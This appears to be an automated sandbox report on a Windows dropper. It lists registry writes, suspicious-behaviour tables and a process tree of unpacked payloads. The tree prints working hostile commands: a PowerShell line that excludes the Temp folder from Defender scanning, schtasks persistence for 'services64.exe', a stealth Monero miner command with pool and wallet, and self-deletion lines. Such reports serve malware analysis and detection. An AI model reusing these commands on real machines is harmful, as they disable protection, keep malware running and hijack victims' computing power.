Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	ZHazhulekema.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Sun05d60bc3b96248e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Sun05d60bc3b96248e5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun05ac1b0207d3ff3b8.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	8	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	65	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	221	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs

pid	Process
3564	GcleanerEU.exe
2876	installer.exe
2668	anyname.exe
3292	gcleaner.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1532	Sun05532f7abc.exe
1532	Sun05532f7abc.exe
1524	powershell.exe
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found

Suspicious behavior: GetForegroundWindowSpam 8 IoCs

pid	Process
1196	Process not Found
2444	WerFault.exe
3780	WerFault.exe
3236	WerFault.exe
3892	WerFault.exe
3748	WerFault.exe
3704	WerFault.exe
3472	WerFault.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1532	Sun05532f7abc.exe
3388	jcjdgdd

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeAssignPrimaryTokenPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeLockMemoryPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeIncreaseQuotaPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeMachineAccountPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeTcbPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeSecurityPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeTakeOwnershipPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeLoadDriverPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeSystemProfilePrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeSystemtimePrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeProfSingleProcessPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeIncBasePriorityPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeCreatePagefilePrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeCreatePermanentPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeBackupPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeRestorePrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeShutdownPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeDebugPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeAuditPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeSystemEnvironmentPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeChangeNotifyPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeRemoteShutdownPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeUndockPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeSyncAgentPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeEnableDelegationPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeManageVolumePrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeImpersonatePrivilege	2080	Sun05d60bc3b96248e5.exe
Token: SeCreateGlobalPrivilege	2080	Sun05d60bc3b96248e5.exe
Token: 31	2080	Sun05d60bc3b96248e5.exe
Token: 32	2080	Sun05d60bc3b96248e5.exe
Token: 33	2080	Sun05d60bc3b96248e5.exe
Token: 34	2080	Sun05d60bc3b96248e5.exe
Token: 35	2080	Sun05d60bc3b96248e5.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	1688	Sun059375dac544fc4a.exe
Token: SeDebugPrivilege	2120	Sun050462125c7d35.exe
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeDebugPrivilege	2836	2893735.exe
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	2036	2.exe
Token: SeDebugPrivilege	2116	PublicDwlBrowser1100.exe
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeDebugPrivilege	1684	BearVpn 3.exe
Token: SeDebugPrivilege	1504	6577916.exe
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeDebugPrivilege	2444	WerFault.exe
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeDebugPrivilege	3060	2977511.exe
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeDebugPrivilege	2312	6287319.exe
Token: SeDebugPrivilege	820	postback.exe
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeShutdownPrivilege	1196	Process not Found
Token: SeDebugPrivilege	900	6778136.exe
Token: SeShutdownPrivilege	1196	Process not Found

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
1196	Process not Found
1196	Process not Found
1000	setup_2.tmp
1196	Process not Found
1196	Process not Found
852	ultramediaburner.tmp
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
2268	iexplore.exe
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
2876	installer.exe
1196	Process not Found
1196	Process not Found
3800	iexplore.exe
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
2268	iexplore.exe
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
4508	iexplore.exe

Suspicious use of SendNotifyMessage 10 IoCs

pid	Process
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found
1196	Process not Found

Suspicious use of SetWindowsHookEx 28 IoCs

pid	Process
2268	iexplore.exe
2268	iexplore.exe
1308	IEXPLORE.EXE
1308	IEXPLORE.EXE
1308	IEXPLORE.EXE
1308	IEXPLORE.EXE
1308	IEXPLORE.EXE
1308	IEXPLORE.EXE
3800	iexplore.exe
3800	iexplore.exe
2452	IEXPLORE.EXE
2452	IEXPLORE.EXE
2452	IEXPLORE.EXE
2452	IEXPLORE.EXE
3100	IEXPLORE.EXE
3100	IEXPLORE.EXE
3100	IEXPLORE.EXE
3100	IEXPLORE.EXE
2268	iexplore.exe
2268	iexplore.exe
4528	IEXPLORE.EXE
4528	IEXPLORE.EXE
2268	iexplore.exe
2268	iexplore.exe
4508	iexplore.exe
4508	iexplore.exe
2468	IEXPLORE.EXE
2468	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1912 wrote to memory of 1284	1912	setup_x86_x64_install.exe	27
PID 1912 wrote to memory of 1284	1912	setup_x86_x64_install.exe	27
PID 1912 wrote to memory of 1284	1912	setup_x86_x64_install.exe	27
PID 1912 wrote to memory of 1284	1912	setup_x86_x64_install.exe	27
PID 1912 wrote to memory of 1284	1912	setup_x86_x64_install.exe	27
PID 1912 wrote to memory of 1284	1912	setup_x86_x64_install.exe	27
PID 1912 wrote to memory of 1284	1912	setup_x86_x64_install.exe	27
PID 1284 wrote to memory of 824	1284	setup_installer.exe	29
PID 1284 wrote to memory of 824	1284	setup_installer.exe	29
PID 1284 wrote to memory of 824	1284	setup_installer.exe	29
PID 1284 wrote to memory of 824	1284	setup_installer.exe	29
PID 1284 wrote to memory of 824	1284	setup_installer.exe	29
PID 1284 wrote to memory of 824	1284	setup_installer.exe	29
PID 1284 wrote to memory of 824	1284	setup_installer.exe	29
PID 824 wrote to memory of 1760	824	setup_install.exe	33
PID 824 wrote to memory of 1760	824	setup_install.exe	33
PID 824 wrote to memory of 1760	824	setup_install.exe	33
PID 824 wrote to memory of 1760	824	setup_install.exe	33
PID 824 wrote to memory of 1760	824	setup_install.exe	33
PID 824 wrote to memory of 1760	824	setup_install.exe	33
PID 824 wrote to memory of 1760	824	setup_install.exe	33
PID 824 wrote to memory of 1756	824	setup_install.exe	34
PID 824 wrote to memory of 1756	824	setup_install.exe	34
PID 824 wrote to memory of 1756	824	setup_install.exe	34
PID 824 wrote to memory of 1756	824	setup_install.exe	34
PID 824 wrote to memory of 1756	824	setup_install.exe	34
PID 824 wrote to memory of 1756	824	setup_install.exe	34
PID 824 wrote to memory of 1756	824	setup_install.exe	34
PID 824 wrote to memory of 1432	824	setup_install.exe	35
PID 824 wrote to memory of 1432	824	setup_install.exe	35
PID 824 wrote to memory of 1432	824	setup_install.exe	35
PID 824 wrote to memory of 1432	824	setup_install.exe	35
PID 824 wrote to memory of 1432	824	setup_install.exe	35
PID 824 wrote to memory of 1432	824	setup_install.exe	35
PID 824 wrote to memory of 1432	824	setup_install.exe	35
PID 824 wrote to memory of 700	824	setup_install.exe	36
PID 824 wrote to memory of 700	824	setup_install.exe	36
PID 824 wrote to memory of 700	824	setup_install.exe	36
PID 824 wrote to memory of 700	824	setup_install.exe	36
PID 824 wrote to memory of 700	824	setup_install.exe	36
PID 824 wrote to memory of 700	824	setup_install.exe	36
PID 824 wrote to memory of 700	824	setup_install.exe	36
PID 824 wrote to memory of 1816	824	setup_install.exe	37
PID 824 wrote to memory of 1816	824	setup_install.exe	37
PID 824 wrote to memory of 1816	824	setup_install.exe	37
PID 824 wrote to memory of 1816	824	setup_install.exe	37
PID 824 wrote to memory of 1816	824	setup_install.exe	37
PID 824 wrote to memory of 1816	824	setup_install.exe	37
PID 824 wrote to memory of 1816	824	setup_install.exe	37
PID 1760 wrote to memory of 1524	1760	cmd.exe	39
PID 1760 wrote to memory of 1524	1760	cmd.exe	39
PID 1760 wrote to memory of 1524	1760	cmd.exe	39
PID 1760 wrote to memory of 1524	1760	cmd.exe	39
PID 1760 wrote to memory of 1524	1760	cmd.exe	39
PID 1760 wrote to memory of 1524	1760	cmd.exe	39
PID 1760 wrote to memory of 1524	1760	cmd.exe	39
PID 824 wrote to memory of 1732	824	setup_install.exe	38
PID 824 wrote to memory of 1732	824	setup_install.exe	38
PID 824 wrote to memory of 1732	824	setup_install.exe	38
PID 824 wrote to memory of 1732	824	setup_install.exe	38
PID 824 wrote to memory of 1732	824	setup_install.exe	38
PID 824 wrote to memory of 1732	824	setup_install.exe	38
PID 824 wrote to memory of 1732	824	setup_install.exe	38
PID 700 wrote to memory of 1532	700	cmd.exe	40

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1912
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1284
- - C:\Users\Admin\AppData\Local\Temp\7zS40543434\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS40543434\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1760
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1524
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe
      4⤵
      Loads dropped DLL
      PID:1756
    - - C:\Users\Admin\AppData\Local\Temp\7zS40543434\Sun05ac1b0207d3ff3b8.exe
        
        Sun05ac1b0207d3ff3b8.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:1672
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1672 -s 972
        6⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2444
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe
      4⤵
      Loads dropped DLL
      PID:1432
    - - C:\Users\Admin\AppData\Local\Temp\7zS40543434\Sun052bbd8bebd9.exe
        
        Sun052bbd8bebd9.exe
        5⤵
        Executes dropped EXE
        
        PID:1716
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun05532f7abc.exe
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:700
    - - C:\Users\Admin\AppData\Local\Temp\7zS40543434\Sun05532f7abc.exe
        
        Sun05532f7abc.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1532
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe
      4⤵
      Loads dropped DLL
      PID:1816
    - - C:\Users\Admin\AppData\Local\Temp\7zS40543434\Sun05640630a6aa.exe
        
        Sun05640630a6aa.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1792
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe
      4⤵
      Loads dropped DLL
      PID:1732
    - - C:\Users\Admin\AppData\Local\Temp\7zS40543434\Sun059375dac544fc4a.exe
        
        Sun059375dac544fc4a.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1688
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:2220
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:2908
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:1996
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2156
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:1732
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:2392
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        Executes dropped EXE
        
        PID:1144
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
        
        C:\ProgramData\6287319.exe
        
        "C:\ProgramData\6287319.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2312
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2312 -s 480
        9⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3748
        
        C:\ProgramData\4692727.exe
        
        "C:\ProgramData\4692727.exe"
        8⤵
        Executes dropped EXE
        
        PID:1948
        
        C:\ProgramData\945384.exe
        
        "C:\ProgramData\945384.exe"
        8⤵
        Executes dropped EXE
        
        PID:2084
        
        C:\ProgramData\6778136.exe
        
        "C:\ProgramData\6778136.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:900
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 604
        9⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2036
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        Executes dropped EXE
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        9⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:1888
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
        8⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\udptest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
        7⤵
        Executes dropped EXE
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\is-9SDGV.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9SDGV.tmp\setup_2.tmp" /SL5="$2017C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        Executes dropped EXE
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\is-0VDF8.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0VDF8.tmp\setup_2.tmp" /SL5="$40188,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\is-SPQMB.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-SPQMB.tmp\postback.exe" ss1
        11⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:820
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        12⤵
        
        PID:904
        
        C:\Users\Admin\AppData\Local\Temp\rZm0TSOCq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rZm0TSOCq.exe"
        13⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:2396
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im rZm0TSOCq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\rZm0TSOCq.exe" & del C:\ProgramData\*.dll & exit
        14⤵
        
        PID:3816
        
        C:\Users\Admin\AppData\Local\Temp\tzJJ1ovsY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tzJJ1ovsY.exe"
        13⤵
        Executes dropped EXE
        
        PID:3284
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        Executes dropped EXE
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe
      4⤵
      Loads dropped DLL
      PID:360
